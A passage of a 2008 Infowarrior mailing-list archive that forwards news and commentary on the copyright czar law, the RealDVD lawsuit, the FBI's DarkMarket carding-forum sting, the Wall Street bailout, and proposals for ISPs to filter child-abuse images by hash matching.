This semester Mr. Krugman is teaching a small graduate-level course on international monetary policy and theory, covering such timely subjects as international liquidity crises. In recent years he has also taught courses on the welfare state and international trade, as well as all-freshman seminars on various economic topics. Monday's award is the last of the six prizes and is not one of the original Nobels, but was created in 1968 by the Swedish central bank in Alfred Nobel's memory. Mr. Krugman was the only winner of the award, which includes a prize of about $1.4 million. From rforno at infowarrior.org Tue Oct 14 01:26:32 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 21:26:32 -0400 Subject: [Infowarrior] - Bush Signs Law Creating Copyright Czar Message-ID: <864F165F-963F-412E-9839-17D14937A80B@infowarrior.org> Bush Signs Law Creating Copyright Czar By David Kravets October 13, 2008 | 5:25:36 PM | Categories: Intellectual Property President Bush on Monday signed into law legislation creating a copyright czar, a cabinet-level position on par with the nation's drug czar. Two weeks ago, the House sent the president the "Enforcement of Intellectual Property Rights Act" (.pdf), a measure the Senate approved days before creating a cabinet-level copyright czar charged with implementing a nationwide plan to combat piracy and "report directly to the president and Congress regarding domestic international intellectual property enforcement programs." The White House successfully lobbied the Senate to remove language tasking the Department of Justice with suing copyright and trademark infringers on behalf of Hollywood (.pdf), the recording industry, manufacturers and software makers. But the Bush administration also said it didn't want (.pdf) a copyright czar, a position on par with the nation's drug czar Congress created in 1982 to wage the war on drugs. Lawmakers, however, sent him the package anyway and the president signed. 
The czar is not likely to be appointed until after the elections. http://blog.wired.com/27bstroke6/2008/10/bush-signs-law.html From rforno at infowarrior.org Tue Oct 14 01:27:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 13 Oct 2008 21:27:56 -0400 Subject: [Infowarrior] - Why Hollywood Hates RealDVD Message-ID: <964E9D10-B21D-4BD0-8017-E663A4A90DF0@infowarrior.org> October 10th, 2008 Why Hollywood Hates RealDVD Legal Analysis by Fred von Lohmann http://www.eff.org/deeplinks/2008/10/why-hollywood-hates-realdvd Why does Hollywood hate RealDVD so much? Here's a hint: it has nothing to do with piracy and everything to do with controlling innovation. Earlier this week, a district court in San Francisco extended the temporary restraining order (TRO) blocking RealNetworks' distribution of its RealDVD software, at least until a full-dress preliminary injunction hearing can be held sometime in late November. Although reporters have done a good job reporting on the hearing, they have not answered a more basic question: why does Hollywood care so much about RealDVD in the first place? It's not about piracy. After all, those who want to copy DVDs have plenty of free, widely available, easy-to-use software to choose from (e.g., Handbrake, DVD Shrink, Mac The Ripper). And those who want to skip the tedium of DVD ripping altogether can easily download movies from unauthorized sources like The Pirate Bay. In short, Hollywood can't possibly believe that the $30, DRM-hobbled RealDVD software represents a piracy threat in an environment rife with easier options. So why unleash all the expensive lawyers to kill RealDVD? Answer: to send a message about what happens to those who innovate without permission in a post-DMCA world. As we've said for years, DRM systems like the Content Scramble System (CSS) used on DVDs are not principally about preventing piracy. 
Rather, DRM is the legal "hook" that forces technology companies to enter into license agreements before they build products that can play movies (Hollywood lawyers candidly admit this "hook IP" strategy). Those license agreements, in turn, define what the devices can and can't do, thereby protecting Hollywood business models from disruptive innovation. This arrangement reverses the previous innovation status quo. Where non-DRM'd content (e.g., books, broadcast TV, the CD) is concerned, innovators do not have to ask permission before building new products that can copy and play copyrighted works (e.g., the photocopier, the VCR, the iPod). But where DRM'd content like DVDs are concerned, Hollywood intended the DMCA's anti-circumvention provisions to slam the door on that kind of disruptive innovation. After the DMCA, technology vendors would have to ask permission, sign licenses, and make concessions, if they were going to build things to play DRM'd Hollywood movies. So it's not that Hollywood implacably hates personal use format-shifting and space-shifting -- rather, Hollywood wants to make sure those new features happen on Hollywood's terms ("pay us again"), on Hollywood's timetable ("later"), and only after valuable concessions have been wrung from technology companies ("watermark detection, compliance & robustness requirements, down-rezzing"). That's why RealDVD is such a threat. By reading the existing CSS license carefully, Real (and Kaleidescape before it) found a way to create a new product category without first getting permission from (and paying obeisance to) the Hollywood studios. Real's defection represents a threat to several schemes that Hollywood has been working on for throttling DVD innovation over the next several years. For example: * Managed Copy: Hollywood has been negotiating for years with technology companies over "Managed Copy," a mechanism that will allow limited copying of DVD and Bluray discs onto PCs and portable devices. 
"Managed Copy" has been promised for years, yet has not materialized, thanks to power struggles inside the organizations that run the relevant DRM licenses (DVD-CCA for DVDs, AACS-LA for Bluray). In the course of these negotiations, Hollywood has managed to wrest several important concessions from technology vendors (including requiring that computers do watermark detection to spot pirated copies when reading data from Bluray discs, and imposing DRM on resulting copies). If those technology companies can build things like RealDVD and Kaleidescape under the terms of the existing contract, then the prospect of more negotiations and concessions for Managed Copy suddenly seems much less appealing. * Digital Copy: Hollywood has begun selling DVDs that come with a second disc that permits the making of a copy on a PC. The catch? You have to pay extra for the right to make this personal use copy -- in other words, Hollywood is stealing your fair use rights and selling them back to you piecemeal. * Internet Download Services: you already bought it on DVD, but now Hollywood wants you to buy it a second time from iTunes, Amazon, or MovieLink if you want to watch the same movie on a PC or iPod. So that's the real story here. It's not about piracy. It's about Real defecting from the DRM licensing cartel, building what consumers want now instead of negotiating endlessly for a spot in Hollywood's next Five Year Plan for the DVD format. 
From rforno at infowarrior.org Tue Oct 14 11:35:47 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 14 Oct 2008 07:35:47 -0400 Subject: [Infowarrior] - Cybercrime Supersite 'DarkMarket' Was FBI Sting Message-ID: <78BA6D56-EE02-45C9-B8E2-6D04BE96290C@infowarrior.org> Cybercrime Supersite 'DarkMarket' Was FBI Sting, Documents Confirm By Kevin Poulsen October 13, 2008 | 4:20:08 PM | Categories: Crime http://blog.wired.com/27bstroke6/2008/10/darkmarket-post.html DarkMarket.ws, an online watering hole for thousands of identity thieves, hackers and credit card swindlers, has been secretly run by an FBI cybercrime agent for the last two years, until its voluntary shutdown earlier this month, according to documents unearthed by a German radio network. Reports from the German national police obtained by the Südwestrundfunk, Southwest Germany public radio, blow the lid off the long running sting by revealing its role in nabbing a German credit card forger active on DarkMarket. The FBI agent is identified in the documents as J. Keith Mularski, a senior cybercrime agent based at the National Cyber Forensics Training Alliance in Pittsburgh, who ran the site under the hacker handle Master Splynter. The NCFTA is a non-profit information sharing alliance funded by financial firms, internet companies and the federal government. It's also home to a seven-agent FBI headquarters unit called the Cyber Initiative and Resource Fusion Unit, which evidently ran the DarkMarket sting. The FBI didn't return a phone call Monday. Like earlier crime sites, DarkMarket allowed buyers and sellers of stolen identities and credit card data to meet and do business in an entrepreneurial, peer-reviewed environment. 
Products for sale ran the gamut from specialized hardware, to electronic banking logins collected from phishing attacks, stolen personal data needed to assume a consumer's identity ("full infos") and credit card magstripe swipes ("dumps"), which are used to produce counterfeit cards. Vendors were encouraged to submit their goods for review before offering them for sale. The unearthed documents, seen by Threat Level, show the FBI sting had begun by November, 2006. An FBI memo sent to the German national police regarding a forum member in that country boasts, "Currently, the FBI has been successful in penetrating the inner 'family' of the carding forum, DarkMarket." A March 2007 e-mail from Mularski's FBI address to his German counterpart puts it bluntly. "Master Splynter is me." The documents indicate the FBI used DarkMarket to build "intelligence briefs" on its members, complete with their internet IP addresses and details of their activities on the site. In at least some cases, the bureau matched the information with transaction records provided by the electronic currency service E-Gold. Last month, Master Splyntr -- now identified as Mularski -- announced he was shuttering the site as of October 4th, citing unwanted attention garnered by a fellow administrator, known as Cha0. From his home in Turkey, Cha0 had aggressively marketed a high-quality ATM skimmer and PIN pad that fraudsters could covertly affix to certain models of cash machines, capturing consumers' account numbers and secret codes. But he began drawing heat this year after reportedly kidnapping and torturing a police informant. He was arrested in Turkey last month, where police identified him as one Cagatay Evyapan. That's why it was time to close DarkMarket, Master Splynter explained, in a message that now rings with irony. "It is apparent that this forum ... is attracting too much attention from a lot of the world services (agents of FBI, SS, and Interpol). 
I guess it was only time before this would happen. It is very unfortunate that we have come to this situation, because ... we have established DM as the premier English speaking forum for conducting business. Such is life. When you are on top, people try to bring you down." The German report confirms rumors that have swirled around DarkMarket since late 2006, when uber-hacker Max Ray Butler cracked the site's server and announced to the underground that he'd caught Master Splynter logging in from the NCFTA's office on the banks of the Monongahela River. Butler ran a site of his own, and the warning was generally dismissed as inter-forum rivalry, even when Butler was arrested in San Francisco last year on credit card fraud charges, and shipped to Pittsburgh for prosecution. Until this afternoon, SpamHaus listed Master Splynter as an Eastern European spammer named Pavel Kaminski, who was active as recently as 2005. It's possible the FBI took over the handle sometime thereafter. In 2004, the Secret Service ran a similar scheme on the crime board ShadowCrew, but that agency used an informant, who went on to commit more crimes -- a risk not likely present with agent Mularski. Lord Cyric, another former DarkMarket administrator, says Master Splynter was invited onto DarkMarket as an admin about two years ago, and was still known as a spammer. Based in Canada, Lord Cyric has sold fake IDs and checks in the underground, but he's convinced he's out of reach of any sting operation. "Worry? Me? Nah," he wrote in an IM interview. "It's a long, slow hard process for them to interest Canadian [law enforcement] to go after someone who doesn't touch drugs nor deals with skimmers. ... It's all about U.S. busts, unless there's a big drug deal and DEA gets involved." Threat Level admires Lord Cyric's bluster, but thinks his days in the underground are numbered.
The FBI almost certainly closed DarkMarket in preparation for a global wave of arrests that will unfold in the next month or so. The site was likely shuttered to avoid an Agatha Christie scenario in which a diminishing pool of cybercrooks are free to speculate about why they're disappearing one-by-one like the hapless dinner guests in Ten Little Indians. Kudos to Südwestrundfunk reporter Kai Laufen, who discovered the operation. I'm sending him the "I Spotted the Fed" tee-shirt I took home from DefCon 7.

From rforno at infowarrior.org Tue Oct 14 11:42:30 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 14 Oct 2008 07:42:30 -0400 Subject: [Infowarrior] - It's Wall Street's Turn to Bolster Confidence Message-ID: <9A976785-C1C6-4CBA-84B9-2D737C3BF6A3@infowarrior.org> (I would agree with Steve's sentiment except for the last paragraph - yes, the bipartisan 'national leadership' did come, but it was too little too late, in my view. Huge rallies like yesterday are to be sold into, not bought, for cash is still king in such volatile periods of intense uncertainty.....FWIW, despite yesterday's rally, I still say we're nowhere near being out of the woods on a variety of economic fronts. ---rf) It's Wall Street's Turn to Bolster Confidence By Steven Pearlstein Tuesday, October 14, 2008; D01 http://www.washingtonpost.com/wp-dyn/content/article/2008/10/13/AR2008101302586_pf.html Now, what was that about Hank Paulson having blown it? How he foolishly let Lehman Brothers go under and started a chain reaction that quickly turned into a financial meltdown? How he was so focused on his cockamamie plan to buy up distressed mortgages and mortgage-backed securities, instead of injecting capital into banks in exchange for shares? How he and the other finance ministers were so way behind the curve this past weekend in failing to come up with a detailed and coordinated plan to restore confidence in financial markets?
The truth is we were going to have a serious financial crisis no matter what Paulson did or didn't do, thanks to the incredible ineptitude of Wall Street and the nation's financial regulators over the past few years, whether an insolvent and mismanaged investment bank was rescued or not. Lehman was the veritable straw that finally broke the back of the financial camel overloaded with debt. If it hadn't been Lehman, it would have been something else. Since Lehman's failure, Paulson has moved faster, more aggressively and more deftly than any of his international counterparts in doing whatever was necessary to stabilize the financial system. Yesterday, he and his collaborators at the Fed and FDIC threw everything they had at it -- flooding the banking system with an unlimited supply of dollars, expanding deposit insurance, putting a guarantee on new bank debt, injecting capital into healthy banks, giving the Japanese the assurances they needed to rescue Morgan Stanley, and doing nothing to discourage free-spending Democrats from their plans to offer another big economic stimulus plan. The result: the biggest one-day rally on stock markets in 70 years. I hope you won't think it petty to point out that some of the people who this past weekend were complaining that the Treasury secretary was being too timid in his response to the financial crisis were some of the same people who, three weeks ago, were complaining about his audacity in demanding a "$700 billion blank check." I know I speak for Gov. Sarah Palin and Joe Six-Packs everywhere in pleading that, for Pete's sake, let's cut the guy a little slack. In putting several trillion dollars in government funds on the line, the country has now done just about everything that Wall Street could have asked to address the financial crisis. The question now, as John Kennedy might have put it, is what Wall Street is ready to do for its country. So far, the answer is not much. 
After getting their closed-door briefing yesterday from Paulson on the government's latest initiatives, Wall Street's finest literally ran from the Treasury to their waiting limousines, bypassing a media scrum eager to convey any scrap of wisdom or insight. Court reporters will tell you they can always tell the innocent from the guilty on these kinds of perp walks, and the Wall Street crowd yesterday looked particularly guilty, unable even to conjure up a soothing word to a nation fretting over its shrunken 401(k)s, or a simple thank you to taxpayers for having saved their bacon. Their silence and invisibility throughout this crisis attests to the moral and political bankruptcy of a financial elite that is the perfect match for the financial bankruptcy they have now visited upon their investors, their creditors and their customers. After yesterday's "historic" meeting, we are told by industry apologists that we are supposed to be grateful to nine leading banks for having "volunteered" to accept additional capital from the Treasury, along with a government guarantee for newly issued bank debt, even if it means having to accept a dilution of existing shares and a few harmless restrictions on their operations. Pardon me if I'm less than blown over by this munificent offer, but it hardly seems commensurate either with the severity of the current crisis or the depth of the banks' culpability in fomenting it. If Wall Street were truly serious about convincing Main Street that we're all in this together, its top executives would have stepped before the cameras yesterday and promised not to cut lines of credit to long-standing business customers who have never missed a payment. They would have committed themselves not to foreclose on any homeowner who is willing and able to refinance into a new, government-guaranteed, fixed-rate mortgage set at 85 percent of the current value of the property.
They would have offered to suspend dividend payments until capital levels had been restored to pre-crisis levels. They would have given us their solemn promise not to advise clients to hold on to their own investments while quietly dumping whatever they can from their own portfolios and shorting every security in sight. With the Treasury now desperate for help in managing its new rescue efforts, they would have volunteered, at no cost to taxpayers, the services of some of those investment bankers and financial wizards who now don't have much else to do. And the maharajas of finance could have set a wonderful example if they had all gotten together and agreed to work for a dollar a year until the crisis has passed. There's a word that captures the instinct to take these kinds of bold moves in the midst of a national crisis -- it's called leadership. We've seen quite a bit of it these past few weeks from public officials like Hank Paulson, Ben Bernanke, Tim Geithner, Sheila Bair, Nancy Pelosi, Barney Frank, John Boehner -- even George Bush. Wall Street, by contrast, has served up a nothing sandwich, a lack of leadership that's been stunning.

From rforno at infowarrior.org Fri Oct 17 01:41:15 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 16 Oct 2008 21:41:15 -0400 Subject: [Infowarrior] - ISPs pressed to become child porn cops Message-ID: <17739543-E18C-4679-A05B-38965A88C3D3@infowarrior.org> http://www.msnbc.msn.com/id/27198621/ New law, new monitoring technology raise concerns about privacy By Bill Dedman and Bob Sullivan msnbc updated 4:40 p.m. ET, Thurs., Oct. 16, 2008 ISPs pressed to become child porn cops New technologies and changes in U.S. law are adding to pressures to turn Internet service providers into cops examining all Internet traffic for child pornography. One new tool, being marketed in the U.S. by an Australian company, offers to check every file passing through an Internet provider's network --
every image, every movie, every document attached to an e-mail or found in a Web search -- to see if it matches a list of illegal images. The company caught the attention of New York's attorney general, who has been pressing Internet companies to block child porn. He forwarded the proposal to one of those companies, AOL, for discussion by an industry task force that is looking for ways to fight child porn. A copy of the company's proposal was also obtained by msnbc.com. Privacy advocates are raising objections to such tools, saying that monitoring all traffic would be an unconstitutional invasion. They say companies can't start watching every customer's activity, and blocking files thought to be illegal, even when the goal is as noble as protecting children. But such monitoring just became easier with a law approved unanimously by the Congress and signed on Monday by President Bush. A section of that law written by Republican presidential candidate Sen. John McCain gives Internet service providers access to lists of child porn files, which previously had been closely held by law enforcement agencies and the National Center for Missing and Exploited Children. Although the law says it doesn't require any monitoring, it doesn't forbid it either. And the law ratchets up the pressure, making it a felony for ISPs to fail to report any "actual knowledge" of child pornography. That actual knowledge could be handed to the Internet companies by technologies like the one proposed by the Australian company, Brilliant Digital Entertainment Ltd. Known as CopyRouter, the software would let ISPs compare computer files -- movies, photographs and documents -- against those lists. Banned files would be blocked, and the requestor would receive a substitute file provided by law enforcement, such as a warning message: "The material you have attempted to access has been identified as child pornography."
The attempt to send or receive the file could then be reported to law enforcement, along with the Internet Protocol address of the requestor. The CopyRouter relies on a controversial new technology called "deep packet inspection," which allows Internet companies to analyze in real time the river of data flowing through their networks. The pipeline would know what was passing through it. You can read more about this technology in Bob Sullivan's Red Tape Chronicles. Child porn foes give proposal to AOL A PowerPoint slide show from Brilliant Digital Entertainment describing the technology was passed on to AOL last month by two powerful forces in the fight against child porn: the office of New York Attorney General Andrew M. Cuomo, who has been calling out ISPs that won't agree to block sites with illegal images, and Ernest E. Allen, the president and CEO of the National Center for Missing and Exploited Children, a nonprofit given by Congress a central role in the fight. When msnbc.com inquired about the proposal, both Cuomo's office and Allen said they were not promoting the technology, merely passing it along to a committee of Internet service providers and software companies as part of "brainstorming" on new technologies to detect illegal images. One of the leading experts on electronic privacy in the U.S. says the proposal would clearly run afoul of the U.S. Constitution, essentially setting up a wiretap without obtaining permission from a judge. "This would be plainly illegal in the United States, whether or not a governmental official imposed this on an ISP or the ISP did this voluntarily," John Morris of the Center for Democracy and Technology said after viewing Brilliant Digital's slide show. "If I were the general counsel of an ISP, I wouldn't touch this with a 10-foot pole." A spokesman for Brilliant Digital Entertainment disputed that, saying the technology would be "non-invasive," would not compromise privacy, would be legal in the U.S. 
and elsewhere, and most important, would curtail the global proliferation of child pornography. "I don't think it takes many voices before the Internet industry separates out those who are prepared to build a business on the trafficking of child sexual exploitation," said Michael Speck, Brilliant Digital's commercial manager in charge of law enforcement products. "If boxes started turning up with Pablo Escobar's special-delivery cocaine inside, they'd stop it, they'd do something about it." How it would work Here's how CopyRouter would work, according to the company's slide show: # A law enforcement agency would make available a list of files known to contain child pornography. Such files are commonly discovered in law enforcement raids, in undercover operations and in Internet searches that start with certain keywords (such as "pre-teens hard core"). Police officers have looked at those files, making a judgment that the children are clearly under age and that the files are illegal in their jurisdiction, before adding them to the list. Each digital file has a unique digital signature, called a hash value, that can be recognized no matter what the file is named, and without having to open the file again. The company calls this list of hash values its Global File Registry. # Whenever an Internet user searched the Web, attached a file to an e-mail or examined a menu of files using file-sharing software on a peer-to-peer network, the software would compare the hash values of those files against the file registry. It wouldn't be "reading" the content of the files -- it couldn't tell a love note from a recipe -- but it would determine whether a file is digitally identical to one on the child-porn list. # If there were no match, the file would be provided to the user who requested it. But if there were a match, transmission of the file would be blocked. The users would instead receive another image or movie or document, containing only a warning screen.
The makers of CopyRouter claim that it can even be used to defeat encryption and compression of files in the Internet's Wild West: the peer-to-peer file-sharing tools such as Gnutella and BitTorrent. Many people use those file-sharing systems for legal traffic, such as independent artists distributing their music, or software developers sharing open-source code. But others use them for illegal traffic in copyrighted music and movies. They also are popular for distributing adult pornography, which is legal, and child pornography, which is not. Can software fool encryption schemes? Encrypted files on the peer-to-peer network could not be decrypted by CopyRouter, but the company claims it can fool the sender's computer into believing that the recipient was requesting an unencrypted and uncompressed file. The slide show calls this "special handling." This is done by changing the underlying protocol settings that establish how the sender and recipient exchange the file. This trickery, unknown to either the sender or recipient, would make it possible for CopyRouter to see the underlying files, calculate a hash value and compare the files to the list of illegal files, Brilliant Digital says. A photo of the company's first test machine can be found online, in the online photos of the company's systems architect, Norberto "Beto" Meijome, author of the PowerPoint presentation. Meijome's portfolio of online photos on Flickr includes photos of his Cisco SCE router on the day he unpacked and installed it, Sept. 11, 2007. He labels the SCE router "the new toy." Brilliant Digital Entertainment has a complicated past. Its subsidiary, Altnet, made news in 2002, when its software shipped with the Kazaa file swapping software, then heir to Napster's throne as the favored way for file swappers to illicitly trade music. Altnet's program was designed to use unused bandwidth and processing power of Kazaa users for such uses as paid advertising and promotions for commercial products.
The company claimed that this activity only occurred if the customer allowed it, but some antivirus firms labeled the software as spyware. Later, Altnet was sued by the recording industry for its role in helping spread the popularity of Kazaa. After settling a lawsuit with the music industry, Brilliant Digital decided to approach file sharing from a new direction, selling products designed to help copyright holders protect their intellectual property. It now describes itself as a "significant online provider of licensed film and music content." Seeking allies to move the new product to market Now the company wants to expand into a new product line: fighting child porn. "We have been working on it for some time," Speck said in a telephone interview from Australia. "We've been in negotiations with ISPs and law enforcement agencies and content owners." Speck said he previously led the anti-piracy organization of the Australian sound recording industry. Now he's lining up meetings in the U.S. next month with Internet providers and the National Center for Missing and Exploited Children. In advance of his trip to the U.S., Speck spoke with the staff of Andrew Cuomo, whose New York attorney general's office has been pressuring Internet service providers to fight child porn. In June, Cuomo announced he was investigating ISPs, using a modern version of the public stocks to encourage cooperation. He set up a Web site listing Internet providers around the nation that made the changes he demanded, as well as "ISPs that have failed to make the same commitment to stop child porn." Cuomo, who was recently cited by McCain as one Democrat he would like to appoint to federal office, has urged Internet service providers to block access to child porn news groups and "purge their servers of child porn Web sites." Speck had a conference call in September with Cuomo's staff, which he said gave him a blunt description of the legal and privacy landscape in the U.S. 
"We'd be grateful for any assistance in getting this to the relevant ISPs and law enforcement agencies, and making any adjustments necessary," Speck said, recounting the conversation with Cuomo's staff. "It was made very clear that, for this to be a viable law enforcement tool, this would have to operate within the legislative framework within the country." After talking with Speck, Cuomo's office passed the proposal on to John D. Ryan, AOL's senior vice president, deputy general counsel and head of its public safety and criminal investigations unit. Ryan received the slide show on Sept. 18, the day before attorneys from Cuomo's office arrived at AOL's headquarters in Virginia to discuss new technologies to fight child porn. Both Cuomo's office and AOL said that the CopyRouter was not discussed explicitly during what was described as a brainstorming session. "We have nothing to do with this technology" "We have not pressured anyone to use this technology," said a Cuomo spokesman, Matthew Glazer. "We have nothing to do with this technology." At the same time, AOL's Ryan received a copy of the slide show from the National Center for Missing and Exploited Children. Known as NCMEC, this private nonprofit organization has an increasing role in the law enforcement effort against child porn, and receives more than $35 million in taxpayer funds each year. NCMEC and Cuomo's office have worked together this year on the child-porn fight, holding a joint press conference to announce Cuomo's Web site. Ryan also has close ties to NCMEC, serving as a member of the board of directors and as leader of its industry Technology Coalition on child porn. Members of that group also include Yahoo, Microsoft, Google and others. (Msnbc.com is a joint venture of Microsoft and NBC Universal.) AOL officials said they did not feel pressured by Cuomo or NCMEC to adopt any particular technology, adding that the company has a long history of fighting child porn on its own initiative.
"The relationship with the attorney general is positive and partnering," Ryan said. AOL has a system of its own AOL officials told msnbc.com that they already examine some files for child porn, block access to those files, and provide evidence to law enforcement. That system (called image detection filtering protocol) apparently is based on the same general principle as CopyRouter, comparing the hash values of files to a known list. But there are significant differences between the two approaches. AOL checks files uploaded as attachments to e-mail against a list of files that AOL has identified as child porn. If the file matches one on its list, the sender is led to believe that the file has been sent, but it has not. AOL's methods have been shared with other Internet service providers. But AOL officials said a device like the CopyRouter would be more extensive and more efficient for two reasons: AOL checks only e-mail attachments, not Web searches or other Internet traffic, and its home-grown list of banned files is much shorter than the lists compiled by law enforcement and NCMEC. "The library of hash values that AOL has, has been derived over time, completely in house from reports from users and files we've stumbled upon," said Christopher G. Bubb, an AOL assistant general counsel in the public safety and criminal investigations unit. "So it's not a government list. Courts have likened it to citizen provided information." Government role would be problematic That distinction is important. Internet service providers could be considered agents of law enforcement if they began comparing files to a list provided by the police and intercepting traffic by substituting a legal file for an illegal one. The Fourth Amendment to the U.S. Constitution forbids unreasonable search and seizure by the government. Courts have held that Internet service providers are within their rights to examine the traffic that flows through their pipeline --
as they must do, for example, to combat spam -- because the scrutiny is being done by a company, not the government. Although they said they could not pass judgment on software proposed by any vendor, the AOL officials suggested that Brilliant Digital's proposal might not work in the U.S., at least not without Congress providing ISPs more legal cover. "Keep in mind that this is developed in a totally different cultural and legal regime. The Australian legal system is quite different from an American legal system," said Ryan, the AOL executive. "It would raise concerns. ... Would we be deemed an agent of the government?" "Not an intelligence-gathering tool" Speck, the Brilliant Digital official, argued that CopyRouter would not put ISPs in a law enforcement role because the list of banned files would be managed by the law enforcement agency, not handed over to the private companies. CopyRouter would consult that list, but at arm's length from the companies. "The responsibility is shifted to law enforcement," Speck said. "We've delivered to Internet service providers something they've called for. ... This is not an intelligence-gathering tool. This is not for developing a list of users. This is an extension of what routers already do." But wouldn't the Internet service provider know which traffic CopyRouter had blocked, and which user had sent or attempted to download it? No, Speck said, because his company's product would be a neutral middleman, not sharing information with the ISP or law enforcement. "All hashes are provided to Global File Registry, which manages a secure database and communications channel between law enforcement agencies and the ISP such that the illicit file hashes targeted by law enforcement remain private and secure to the relevant law enforcement agency," he said in an e-mail after the interview. "There is no personal (sender/receiver) information identified, and privacy is maintained."
The company's slide show, however, does describe information on users being passed directly to law enforcement. Any files that matched the child porn list would be reported to a "law enforcement data collector," along with IP addresses identifying the user's computer. The slide show says, "Any hits here will generate a 'red' report, which will be routed to the police collector server ONLY. These reports contain full IP information." Although Brilliant Digital says no law enforcement agency has signed on to the CopyRouter plan, that hasn't kept the company from including a familiar blue seal in its slide show. At each point when a law enforcement computer is depicted, it bears a mark that closely resembles the FBI logo. Only when the logo is magnified can one see that it says "Friendly Bus Investigator" rather than "Federal Bureau of Investigation." The FBI hasn't signed on to the plan, Speck said, and the logo was not meant to imply any endorsement. The FBI met a hailstorm of criticism in 2000 when the existence of its Carnivore project was revealed. The packet-sniffing technology was used to monitor and log traffic when installed at an Internet service provider. The FBI by 2005 had stopped using the technology, in favor of commercial tools. New law may take law enforcement out of the loop Under the new U.S. law, a system like CopyRouter might not require involvement of law enforcement. The McCain portion of the new child-porn law allows such a system to be set up by the Internet service providers, because it gives them access to those lists of illegal files. The key player in that transfer is the National Center for Missing and Exploited Children. Although it's a nonprofit organization, NCMEC has increasingly taken on law enforcement roles, with Congress requiring that complaints of child pornography be sent to its CyberTipline. Since 1998, NCMEC says, it has received more than 300,000 reports from ISPs.
And it gives them a daily list of Internet addresses that appear to host child porn, so the companies can choose to block those Web pages. The new law authorizes NCMEC to go further, handing to Internet service providers the list of files judged to be child porn. Law enforcement agencies give those hash values to NCMEC, which will be allowed (but not required) to give them to the ISPs. That cooperation would allow the ISPs to use CopyRouter or their own home-grown solutions, without including cops in the loop directly. That provision was part of the SAFE Act, a bill introduced by Sen. McCain and Democratic Sen. Chuck Schumer of New York. A McCain aide called the bill a "NCMEC wish list." The SAFE Act also made it a felony for ISPs to fail to report child porn, if they discover it, with penalties up to $300,000 for each instance. McCain's bill got caught in a tug-of-war with a broader bill written by another player in the presidential election, Sen. Joe Biden, the Democratic vice presidential candidate. Biden's solution leaned more toward law enforcement, giving more money to the Justice Department and state Internet Crimes Against Children task forces, which investigate child pornography. With NCMEC lined up behind McCain's bill, and other child protection activists (and Oprah Winfrey) pushing for Biden's bill, Congress finally passed them both: the McCain bill was folded into the Biden bill, which passed the House and Senate without objection. Republicans were able to cut the spending in the Biden bill, down to $300 million. With the new law in place, NCMEC has a plan for ISPs to use their new access to the hash values. "We believe that there needs to be more proactive, voluntary methods to identify illegal child pornography content that bring it to their attention," said Allen, the NCMEC president. "We are working with leading ISPs to do that."
He said NCMEC's Hash Sharing System would share with Internet service providers information on only the "worst of the worst" images of child pornography. An image must depict a pre-pubescent child who has been identified by law enforcement. And it must depict one of the following: "oral, vaginal or anal penetration and/or sexual contact involving a child whether it be genital, digital, or a foreign object; an animal involved in some form of sexual behavior with a child; or lewd or lascivious exhibition of the genitalia or anus." "Through this project, NCMEC is also working with the members of the Technology Coalition to test existing software and develop new technologies that will enable ISPs to identify apparent child pornography images by hash value and block them," Allen wrote in an e-mail. Some ISPs willing to police copyright law The idea of turning Internet service providers into cops has been opposed and embraced by different ISPs in a different realm -- copyright protection. The recording and movie industries have pressed ISPs to monitor their customers to detect traffic copyright violations. AT&T has said it hopes to monitor for pirated content, and has been in discussions with content companies, including NBC Universal (co-owner of msnbc.com), which has pushed for such filtering. Microsoft (the other co-owner of msnbc.com) has said it opposes filtering by ISPs. ISPs also have run into public and government opposition just for slowing down, not blocking, some Internet traffic. The Federal Communications Commission ruled in August, on a 3-2 vote, that Comcast's limiting of BitTorrent traffic was illegal. Comcast said it was merely trying to keep the flood of peer-to-peer file sharing from slowing down the Internet for everyone else. As for CopyRouter, the company's manager said it would not slow down Internet traffic noticeably, because it's not inspecting the contents of files, merely comparing their hash values to a list, which can be done quickly.
Privacy advocates have already raised objections to deep-packet inspection. Earlier this year, a California company named NebuAd proposed a service that would observe Web surfers' Internet habits through machines installed at ISPs, then inject context-sensitive advertising into the Web sites the consumers visited. It called the system "Behavioral Targeting." Public outcry and rumblings of an investigation from Congress led firms considering the technology to pull out. Morris, of the Center for Democracy and Technology, said Brilliant Digital's plan constitutes an illegal wiretap, and would run afoul of the Electronic Communications Privacy Act. No firm can listen in on private communications unless it is instructed to do so by a law enforcement official with a proper court order, he said. "Enormous First Amendment problems" Even then, no government agency -- even a law enforcement agency or state attorney general's office -- could impose a requirement to stop all files on a blacklist, or otherwise create a list of forbidden content, Morris said. Such a list would not pass constitutional muster. "You can't declare speech, or images, illegal without judicial proceedings," Morris said. "... That creates enormous First Amendment problems. You can't have an agency or outside firm acting as judge and jury on these images." Also, blocking images before they were delivered would constitute a prior restraint of communication, Morris said, violating the First Amendment right of free speech. Other methods used to combat child porn -- logging IP addresses of frequent senders and investigating them, by using a subpoena to force ISPs to reveal the name, and then knocking on the user's door -- raise no such constitutional issues, Morris said. He compared that to a law enforcement official overhearing illegal speech in a public place and prosecuting a speaker. Brilliant Digital's scheme, he said, is more like picking up a telephone and listening in on private conversations.
"As horrible as child pornography is, and it is horrible, you still have to follow the Constitution," Morris said.

At NCMEC, Allen said the privacy interests are being heard. "We have been very sensitive to legitimate free speech and privacy-related concerns. That is one of the reasons we are focusing exclusively on pre-pubescent children and the most egregious images. That does not suggest that child pornography images involving 13-year-old children are acceptable or less serious, however, traditional law enforcement investigation and prosecution efforts are being used for those situations."

A different approach

Another child protection group has a different approach. The National Association to Protect Children, which advised Sen. Biden on his bill, said that blocking of files by Internet service providers could easily be seen by the public as "overreaching," making it harder to get public support for efforts of law enforcement. What's needed, said the group's executive director, Grier Weeks, is for cops to investigate the leads they already have.

"The Department of Justice and all 50 attorneys general are sitting on a mountain of evidence leading straight to the doors of child pornography traffickers," Weeks said. "We could rescue hundreds of thousands of child sexual assault victims tomorrow in America, without raising any constitutional issues whatsoever. But government simply won't spend the money to protect these children. Instead of arrests by the Federal Bureau of Investigation, the child exploitation industry now faces Internet pop-ups from the Friendly Bus Investigators. That was always the fundamental difference between the Biden bill and the McCain bill. Biden wanted to fund cops to rescue children. McCain wanted to outsource the job."

Sen. McCain's general counsel, Lee C. Dunn, said that he's happy that both the law enforcement and technology approaches became law, that his focus was on protecting children.
